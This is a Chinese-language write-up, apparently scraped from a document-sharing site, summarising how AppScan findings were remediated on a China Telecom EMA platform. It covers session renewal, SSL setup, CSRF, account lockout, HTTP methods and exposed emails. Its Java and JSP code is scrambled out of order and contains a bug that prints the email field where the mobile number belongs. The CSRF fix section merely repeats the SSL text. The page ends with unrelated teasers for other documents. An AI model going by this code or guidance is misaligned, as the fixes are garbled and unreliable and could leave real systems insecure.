3.4 應(yīng)用程序解決方案
會(huì)話標(biāo)識(shí)未更新,Appscan給出的描述是建議用戶每次登錄時(shí)需使用新的會(huì)話標(biāo)識(shí)。應(yīng)用程序?qū)崿F(xiàn)上就是在登錄模塊,添加以下代碼,即用戶登錄后,重新生成會(huì)話。
HttpSession session = request.getSession(false);if(session!=null){ //讓cookie過期
session.invalidate();
Cookie cookie = request.getCookies()[0];//獲取cookie
cookie.setMaxAge(0);//讓cookie過期 } request.getSession(true);//生成新會(huì)話
經(jīng)過測(cè)試,這段代碼只在weblogic和tomcat下才有效,在公司中間件webspeed及jboss6.0下問題都依然存在,但從掃描的結(jié)果信息分析看,漏洞已經(jīng)解決,分析判斷應(yīng)該只是session處理機(jī)制不同,AppScan工具仍認(rèn)為存在漏洞風(fēng)險(xiǎn)。在與電信溝通中我們存在一個(gè)經(jīng)驗(yàn)教訓(xùn)大家一定要吸取,不能過渡迷信流行的自動(dòng)化測(cè)試工具,尤其是對(duì)于Appscan這種判斷防御行為的復(fù)雜軟件,僅靠有限的規(guī)則設(shè)置就當(dāng)做是web安全的唯一標(biāo)準(zhǔn)這顯然不太合理,這種情況一定要與測(cè)試方溝通解釋。
另一方面,對(duì)于公司的產(chǎn)品webspeed,也想提點(diǎn)建議,商務(wù)項(xiàng)目采用公司的產(chǎn)品為公司節(jié)約了不少成本,但是我們產(chǎn)品后續(xù)升級(jí)維護(hù)也必須重視起來,當(dāng)確認(rèn)出是webspeed本身問題后,聯(lián)系vasg相關(guān)人員進(jìn)行協(xié)調(diào)解決,根本沒有非常了解該產(chǎn)品技術(shù)人員支持,只是一個(gè)剛?cè)肼毜耐略谂浜蠝y(cè)試。調(diào)試了一周時(shí)間仍不能解決,最后只能作為一個(gè)遺留問題擱置。公司一直在向產(chǎn)品化轉(zhuǎn)變,但是自身的產(chǎn)品維護(hù)、升級(jí)、管理仍然需要改進(jìn)。
中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 已解密登錄請(qǐng)求 4.1 已解密登錄請(qǐng)求概述
在應(yīng)用程序測(cè)試過程中,檢測(cè)到將未加密的登錄請(qǐng)求發(fā)送到服務(wù)器。由于登錄過程所用的部分輸入字段(例如:用戶名、密碼、電子郵件地址、社會(huì)保險(xiǎn)號(hào)碼,等等)是個(gè)人敏感信息,建議通過加密連接(如 SSL)將其發(fā)送到服務(wù)器。任何以明文傳給服務(wù)器的信息都可能被竊,稍后可用來電子欺騙身份或偽裝用戶。此外,若干隱私權(quán)法規(guī)指出,用戶憑證之類的敏感信息一律以加密方式傳給網(wǎng)站。
4.2 安全風(fēng)險(xiǎn)及原因分析
安全風(fēng)險(xiǎn)中,可能會(huì)竊取諸如用戶名和密碼等未經(jīng)加密即發(fā)送了的用戶登錄信息
原因:諸如用戶名、密碼和信用卡號(hào)之類的敏感輸入字段未經(jīng)加密即進(jìn)行了傳 遞
4.3 AppScan掃描建議
1.確保所有登錄請(qǐng)求都以加密方式發(fā)送到服務(wù)器。2.請(qǐng)確保敏感信息,例如:密碼
-社會(huì)保險(xiǎn)號(hào)碼駕照號(hào)碼
-電子郵件地址郵政編碼
一律以加密方式傳給服務(wù)器。4.4 應(yīng)用程序解決方案
已解密的登錄請(qǐng)求,要求就是數(shù)據(jù)要加密傳輸。最簡(jiǎn)單有效的解決方式采用SSL加密協(xié)議傳輸,但是由于EMA服務(wù)管理平臺(tái)業(yè)務(wù)的特殊性,采用SSL加密方式對(duì)現(xiàn)有的業(yè)務(wù)影響太大,所以最終沒有采用此種方式解決該問題,但個(gè)人在進(jìn)行測(cè)試過程中也嘗試在tomcat和jboss下SSL方式配置,寫下來供參考。
中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
Jboss內(nèi)核也是tomcat,所以兩者配置基本都是一樣,都是在生成證書文件后,在service.xml 進(jìn)行配置:
1.進(jìn)入到cmd 進(jìn)入到j(luò)dk bin目錄下執(zhí)行keytool-genkey-alias tomcat-keyalg RSA-keystore webspeed.keystore 生成證書 2.在service.xml配置SSL keystoreFile=”C:tomcat-5.5.26confwebspeed.keystore“ keystorePass=”1111aaaa“/> 這樣配置后雖然可以通過https訪問,但仍然還可以通過8080使用普通的http訪問,所以還必須禁止普通模式登錄。所以還得在web.xml添加配置。01 “跨站點(diǎn)偽造請(qǐng)求(CSRF)”攻擊可讓黑客以受害者的名義在易受攻擊的站點(diǎn)上運(yùn)行操作。當(dāng)易受攻擊的站點(diǎn)未適當(dāng)驗(yàn)證請(qǐng)求來源時(shí),便可能出現(xiàn)這個(gè)攻擊。這個(gè)漏洞的嚴(yán)重性取決于受影響的應(yīng)用程序的功能,例如,對(duì)搜索頁面的 CSRF 攻擊,嚴(yán)重性低于對(duì)轉(zhuǎn)帳頁面或概要更新頁面的 CSRF 攻擊。 這項(xiàng)攻擊的執(zhí)行方式,是強(qiáng)迫受害者的瀏覽器向易受攻擊的站點(diǎn)發(fā)出 HTTP 請(qǐng)求。如果用戶目前已登錄受害者站點(diǎn),請(qǐng)求會(huì)自動(dòng)使用用戶的憑證(如會(huì)話 Cookie、用戶的 IP 地址,以及其他瀏覽器認(rèn)證方法)。攻擊者利用這個(gè)方法來偽造受害者的身份,再代替他來提交操作。換句話來說,易受攻擊的站點(diǎn)未采取適當(dāng)措施來驗(yàn)證用戶實(shí)際是否想執(zhí)行特定操作。強(qiáng)迫受害者發(fā)送非預(yù)期的請(qǐng)求,方法有許多種: -通過電子郵件向受害者發(fā)送易受攻擊應(yīng)用程序的惡意鏈接。在公共論壇中,張貼易受攻擊站點(diǎn)的鏈接。中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) -利用站點(diǎn)(或另一個(gè)站點(diǎn))的“跨站點(diǎn)腳本編制”或“鏈接注入”漏洞,將瀏覽器自動(dòng)重定向到易受攻擊的站點(diǎn)。 如果攻擊者利用易受攻擊的站點(diǎn)本身的“鏈接注入”漏洞,可以增加用戶通過站點(diǎn)認(rèn)證的可能性,進(jìn)而增加攻擊成功的可能性。 例如,攻擊者可以利用上述任何選項(xiàng)來誘惑受害者查看含有下列條目的頁面: 這會(huì)使受害者的瀏覽器自動(dòng)請(qǐng)求 URL 及瀏覽器的當(dāng)前憑證。如果這個(gè)銀行業(yè)站點(diǎn)易受到 CSRF 攻擊,它會(huì)根據(jù)應(yīng)用程序邏輯,從受害者的帳戶中,將 1000 美元轉(zhuǎn)賬到 John 的銀行帳戶?!翱缯军c(diǎn)偽造請(qǐng)求”攻擊也稱為 CSRF(發(fā)音為 C-Serf)、XSRF、“跨站點(diǎn)偽造引用”、“單鍵攻擊”以及“會(huì)話騎乘”。您可以利用下列方式來驗(yàn)證您的應(yīng)用程序是否易受到 CSRF 攻擊: [1] 檢查易受攻擊的鏈接/請(qǐng)求是否未包括攻擊者難以猜中的參數(shù) [2] 檢查易受攻擊的鏈接/請(qǐng)求是否會(huì)執(zhí)行只應(yīng)自愿執(zhí)行的操作 含有用戶在不知不覺中提交的請(qǐng)求所能直接訪問的敏感操作的應(yīng)用程序,被視為很容易遭受 CSRF 攻擊。CSRF 也可能出現(xiàn)在登錄頁面和注銷頁面上。由于攻擊者可以偽造來自受害者的連續(xù)注銷請(qǐng)求,因此 CSRF 可能導(dǎo)致服務(wù)拒絕。在登錄頁面上,CSRF 可以允許攻擊者使用包含攻擊者用戶名和密碼的偽造請(qǐng)求來將客戶機(jī)登錄到攻擊者的賬戶中。登錄 CSRF 攻擊會(huì)帶有嚴(yán)重的后果,這取決于其他站點(diǎn)行為。例如,如果站點(diǎn)保留了用戶操作的歷史記錄(例如搜索歷史記錄),那么攻擊者將能夠在易受攻擊的站點(diǎn)上查看受害者之前執(zhí)行的操作。5.2 安全風(fēng)險(xiǎn)及原因分析 安全風(fēng)險(xiǎn)中,可能會(huì)竊取或操縱客戶會(huì)話和 cookie,它們可能用于模仿合法用戶,從而使黑客能夠以該用戶身份查看或變更用戶記錄以及執(zhí)行事務(wù) 原因:應(yīng)用程序使用的認(rèn)證方法不充分 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 5.3 AppScan掃描建議 如果要避免 CSRF 攻擊,每個(gè)請(qǐng)求都應(yīng)該包含唯一標(biāo)識(shí),它是攻擊者所無法猜測(cè)的參數(shù)。建議的選項(xiàng)之一是添加取自會(huì)話 cookie 的會(huì)話標(biāo)識(shí),使它成為一個(gè)參數(shù)。服務(wù)器必須檢查這個(gè)參數(shù)是否符合會(huì)話 cookie,若不符合,便廢棄請(qǐng)求。攻擊者無法猜測(cè)這個(gè)參數(shù)的原因是應(yīng)用于 cookie 的“同源策略”,因此,攻擊者無法偽造一個(gè)虛假的請(qǐng)求,讓服務(wù)器誤以為真。攻擊者難以猜測(cè)且無法訪問的任何秘密(也就是無法從其他域訪問),都可用來替換會(huì)話標(biāo)識(shí)。這可以防止攻擊者設(shè)計(jì)看似有效的請(qǐng)求。 5.4 應(yīng)用程序解決方案 已解密的登錄請(qǐng)求,要求就是數(shù)據(jù)要加密傳輸。最簡(jiǎn)單有效的解決方式采用SSL加密協(xié)議傳輸,但是由于EMA服務(wù)管理平臺(tái)業(yè)務(wù)的特殊性,采用SSL加密方式對(duì)現(xiàn)有的業(yè)務(wù)影響太大,所以最終沒有采用此種方式解決該問題,但個(gè)人在進(jìn)行測(cè)試過程中也嘗試在tomcat和jboss下SSL方式配置,寫下來供參考。6 不充分賬戶封鎖 6.1 不充分賬戶封鎖概述 蠻力攻擊是指惡意用戶發(fā)送大量可能的密碼和/或用戶名以訪問應(yīng)用程序的嘗試。由于該技術(shù)包含大量登錄嘗試,未限制允許的錯(cuò)誤登錄請(qǐng)求次數(shù)的應(yīng)用程序很容易遭到這類攻擊。因此,強(qiáng)烈建議您對(duì)帳戶限制允許的錯(cuò)誤登錄嘗試次數(shù),超過該次數(shù),便鎖定該帳戶。樣本利用: 下列請(qǐng)求說明密碼猜測(cè)請(qǐng)求: http://site/login.asp?username=EXISTING_USERNAME&password=GUESSED_PASSWORD 如果站點(diǎn)在若干次錯(cuò)誤嘗試之后并不鎖定測(cè)試的帳戶,攻擊者最終可能會(huì)發(fā)現(xiàn)帳戶密碼,并使用它來假冒帳戶的合法用戶。6.2 安全風(fēng)險(xiǎn)及原因分析 安全風(fēng)險(xiǎn)高,可能會(huì)升級(jí)用戶特權(quán)并通過 Web 應(yīng)用程序獲取管理許可權(quán) 原因:Web 應(yīng)用程序編程或配置不安全 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 6.3 AppScan掃描建議 請(qǐng)確定允許的登錄嘗試次數(shù)(通常是 3-5 次),確保超出允許的嘗試次數(shù)之后,便鎖定帳戶。為了避免真正的用戶因帳戶被鎖定而致電支持人員的麻煩,可以僅臨時(shí)性暫掛帳戶活動(dòng),并在特定時(shí)間段之后啟用帳戶。帳戶鎖定大約 10 分鐘,通常便足以阻止蠻力攻擊。 6.4 應(yīng)用程序解決方案 根據(jù)掃描建議,web應(yīng)用程序設(shè)定允許登錄嘗試次數(shù),登錄連續(xù)失敗超過設(shè)定次數(shù),就鎖定用戶,失敗次數(shù)靈活配置。 在用戶登錄時(shí)進(jìn)行驗(yàn)證: if(!encrypter.encrypt(userPassword).equalsIgnoreCase({ } //更新此用戶登錄失敗次數(shù) this.updateLoginFailTimes(userCode);//如果用戶連續(xù)登錄失敗次數(shù)超過配置值則將其鎖定 int loginLockTimes=this.getLoginLockTimes();if(this.getLoginFailTimes(userCode)>=loginLockTimes){ } throw new MySecurityException(”密碼不正確!用戶:“ + userCode);this.lockUser(userCode);user.getLOGIN_PASSWD()== null ? ”“ : user.getLOGIN_PASSWD()))7 啟用不安全HTTP方法 7.1 啟用不安全HTTP方法概述 似乎 Web 服務(wù)器配置成允許下列其中一個(gè)(或多個(gè))HTTP 方法(動(dòng)詞): -DELETE COPY PROPFIND LOCK-UNLOCK 這些方法可能表示在服務(wù)器上啟用了 WebDAV,可能允許未授權(quán)的用戶對(duì)其進(jìn)行利用。 7.2 安全風(fēng)險(xiǎn)及原因分析 安全風(fēng)險(xiǎn)中,可能會(huì)在 Web 服務(wù)器上上載、修改或刪除 Web 頁面、腳本和文件 原因:Web 服務(wù)器或應(yīng)用程序服務(wù)器是以不安全的方式配置的 7.3 AppScan掃描建議 如果服務(wù)器不需要支持 WebDAV,請(qǐng)務(wù)必禁用它,或禁止不必要的 HTTP 方法(動(dòng)詞)。 7.4 應(yīng)用程序解決方案 修改web工程中web.xml,增加安全配置信息,禁用不必要HTTP方法 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 。 很多 Web 應(yīng)用程序程序員使用 HTML 注釋,以在需要時(shí)幫助調(diào)試應(yīng)用程序。盡管添加常規(guī)注釋有助于調(diào)試應(yīng)用程序,但一些程序員往往會(huì)遺留重要數(shù)據(jù)(例如:與 Web 應(yīng)用程序相關(guān)的文件名、舊的鏈接或原非供用戶瀏覽的鏈接、舊的代碼片段等)。8.2 安全風(fēng)險(xiǎn)及原因分析 安全風(fēng)險(xiǎn)低,能會(huì)收集有關(guān) Web 應(yīng)用程序的敏感信息,如用戶名、密碼、機(jī)器名和/或敏感文件位置 原因:程序員在 Web 頁面上留下調(diào)試信息 8.3 AppScan掃描建議 [1] 請(qǐng)勿在 HTML 注釋中遺留任何重要信息(如文件名或文件路徑)。 [2] 從生產(chǎn)站點(diǎn)注釋中除去以前(或未來)站點(diǎn)鏈接的跟蹤信息。 [3] 避免在 HTML 注釋中放置敏感信息。 [4] 確保 HTML 注釋不包括源代碼片段。 [5] 確保程序員沒有遺留重要信息。 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 8.4 應(yīng)用程序解決方案 雖然這個(gè)漏洞為低級(jí)別漏洞,但電信方也是要求必須修復(fù),要修改此漏洞需要檢查工程中的每一個(gè)jsp頁面,工作量還是挺大。所以在后續(xù)開發(fā)過程中注釋盡量寫英文注釋,盡量不要遺留敏感注釋信息在jsp代碼中,養(yǎng)成良好的編碼習(xí)慣才是解決問題根本。發(fā)現(xiàn)電子郵件地址模式 9.1 發(fā)現(xiàn)電子郵件地址模式概述 Spambot 搜尋因特網(wǎng)站點(diǎn),開始查找電子郵件地址來構(gòu)建發(fā)送自發(fā)電子郵件(垃圾郵件)的郵件列表。AppScan 檢測(cè)到含有一或多個(gè)電子郵件地址的響應(yīng),可供利用以發(fā)送垃圾郵件。而且,找到的電子郵件地址也可能是專用電子郵件地址,對(duì)于一般大眾應(yīng)是不可訪問的。9.2 安全風(fēng)險(xiǎn)及原因分析 安全風(fēng)險(xiǎn)低,能會(huì)收集有關(guān) Web 應(yīng)用程序的敏感信息,如用戶名、密碼、機(jī)器名和/或敏感文件位置 原因:Web 應(yīng)用程序編程或配置不安全 9.3 AppScan掃描建議 從 Web 站點(diǎn)中除去任何電子郵件地址,使惡意的用戶無從利用。 9.4 應(yīng)用程序解決方案 根據(jù)掃描建議刪除注釋中出現(xiàn)email地址信息,如果頁面中要顯示mail地址轉(zhuǎn)為圖片形式展示。如:ema服務(wù)管理平臺(tái)首頁需要展示客戶聯(lián)系方式,并且聯(lián)系方式、email等信息,這些信息用戶都是可以自行修改的,因?yàn)榘薳mail地址,所以聯(lián)系方式就轉(zhuǎn)為圖片形式: <%@ page language=”java“ contentType=”text/html;charset=gb2312“%> <%@ include file=”/common/taglib.jsp“ %> <%@ include file=”/common/chart.jsp“ %> <%@ page import=”java.util.List,java.util.*,java.awt.*,java.awt.image.*,com.su 17 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) n.image.codec.jpeg.*,java.util.*“ %> <%@ page import=”com.sitech.ismp.informationService.publish.dao.TB_SYS_SUPPORT_STAFFDao“ %> <% List typeList =(List)request.getAttribute(”typeList“);out.clear();out = pageContext.pushBody();response.addHeader(”pragma“,”NO-cache“);response.addHeader(”Cache-Control“,”no-cache“);response.addDateHeader(”Expries“,0);int rowheight=20; int width=135,height=rowheight*typeList.size();String ty= ”“;String mob=”“;for(int i=0;i HashMap hm=(HashMap)typeList.get(i);ty=(String)hm.get(”TYPE_ID“);List sta =(List)dao.findSupportStaffByTypeId(ty);for(int k=0;k TB_SYS_SUPPORT_STAFFDao dao= new TB_SYS_SUPPORT_STAFFDao();response.setContentType(”image/jpeg“); 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) HashMap map =(HashMap)sta.get(k); mob =(String)map.get(”MOBILE“); height+=3*rowheight; if(mob!=null)height+=rowheight; } } BufferedImage image = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);Graphics g = image.getGraphics();g.setColor(Color.white);g.fillRect(0, 0, width, height);g.setColor(Color.BLUE);Font font=new Font(”宋體“,Font.PLAIN,13);g.setFont(font);int row=0; String typeid = ”“; String typename=”“; String name = ”“; String tel=”“; String mail = ”“; String mobile=”“; for(int i=0;i HashMap hm=(HashMap)typeList.get(i); typeid=(String)hm.get(”TYPE_ID“); typename=(String)hm.get(”TYPE_NAME“); row++; g.drawString(typename,0,(row-1)*rowheight+10); List staffs =(List)dao.findSupportStaffByTypeId(typeid); for(int k=0;k HashMap map =(HashMap)staffs.get(k); name =(String)map.get(”NAME“); tel =(String)map.get(”TEL“); mail =(String)map.get(”MAIL“); mobile =(String)map.get(”MOBILE“); row++; g.drawString(name+”:"+tel,0,(row-1)*rowheight+10); row++; g.drawString(mail,0,(row-1)*rowheight+10); if(mobile!=null){ row++; g.drawString(mail,0,(row-1)*rowheight+10);} 19 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) } } g.dispose();ServletOutputStream outStream = response.getOutputStream(); JPEGImageEncoder encoder encoder.encode(image);outStream.close();=JPEGCodec.createJPEGEncoder(outStream);%> 文檔為doc格式 一、工作上的漏洞 (一) 具體體現(xiàn): 1、 學(xué)習(xí)不夠,沒有把科學(xué)發(fā)展觀理論與學(xué)校教育教學(xué)緊密結(jié)合。在運(yùn)用科學(xué)發(fā)展理論來指導(dǎo)教育教學(xué)時(shí),眼光過度關(guān)注學(xué)校發(fā)展,忽視了科學(xué)發(fā)展理論對(duì)...... 縣農(nóng)村信用合作聯(lián)社科技信息部 內(nèi)部控制缺陷和漏洞梳理排查情況進(jìn)展報(bào)告 風(fēng)險(xiǎn)合規(guī)部: 《關(guān)于印發(fā)縣農(nóng)村信用合作聯(lián)社內(nèi)部控制缺陷和漏洞梳理排查工作實(shí)施細(xì)則的通知》(農(nóng)信發(fā)﹝2...... 不相容職務(wù)不分離案例案例一
2004年10月19號(hào),北京市中級(jí)人民法院開庭審理原國(guó)家自然科學(xué)基金委員會(huì)資金管理處會(huì)計(jì)卞中涉嫌貪污挪用公款2.2億元的巨額資金一案,卞中被判死緩。...... 資源綜合利用情況總結(jié)我公司自2012年3月通過資源綜合利用企業(yè)再認(rèn)定以來,緊緊抓住城市綜合建設(shè)、小城鎮(zhèn)新規(guī)劃快速發(fā)展對(duì)水泥需求較大有利機(jī)遇,把資源綜合利用工作作為生產(chǎn)經(jīng)...... 開展“查管理,堵漏洞”活動(dòng)總結(jié) 4月10日,我們收聽了國(guó)家電力公司關(guān)于開展“求真務(wù)實(shí)、作風(fēng)建設(shè)年”活動(dòng)的電視電話會(huì)議,這個(gè)會(huì)議體現(xiàn)了國(guó)電公司領(lǐng)導(dǎo)對(duì)作風(fēng)建設(shè)的高度重視。會(huì)后...... 網(wǎng)站安全整改報(bào)告 收到教育局中心機(jī)房發(fā)來的網(wǎng)站安全漏洞檢測(cè)報(bào)告,對(duì)被檢測(cè)的域名地址進(jìn)行確認(rèn),我校主要近階段處在新舊網(wǎng)站交替時(shí)期,舊網(wǎng)站還沒有退役,新網(wǎng)站也已上線。被檢測(cè)...... 漏洞整改報(bào)告 1. 漏洞信息 Apache Struts2遠(yuǎn)程命令執(zhí)行漏洞,可以遠(yuǎn)程執(zhí)行命令,獲取敏感信息。 2. 漏洞原因分析 Apache Struts2 版本較低, 不是最新版本; 3. 漏洞處理過程 升...... 超市收銀漏洞如何監(jiān)管 收銀漏洞說白了就是收銀員有這樣那樣的損公肥私(包括家人)行為,將本不屬于自己的錢據(jù)為己有,超市方卻又無法做到真正的控制。收銀漏洞這樣的行為放任下去,......
運(yùn)營(yíng)中心聯(lián)系方式
聲明:本文內(nèi)容由互聯(lián)網(wǎng)用戶自發(fā)貢獻(xiàn)自行上傳,本網(wǎng)站不擁有所有權(quán),未作人工編輯處理,也不承擔(dān)相關(guān)法律責(zé)任。如果您發(fā)現(xiàn)有涉嫌版權(quán)的內(nèi)容,歡迎發(fā)送郵件至:645879355@qq.com 進(jìn)行舉報(bào),并提供相關(guān)證據(jù),工作人員會(huì)在5個(gè)工作日內(nèi)聯(lián)系你,一經(jīng)查實(shí),本站將立刻刪除涉嫌侵權(quán)內(nèi)容。 工作上的漏洞
漏洞排查情況報(bào)告(★)
內(nèi)控漏洞案例
資源利用總結(jié)
開展“查管理,堵漏洞”活動(dòng)總結(jié)
網(wǎng)站漏洞整改報(bào)告
漏洞整改報(bào)告IDC-ISP
超市收銀漏洞如何監(jiān)管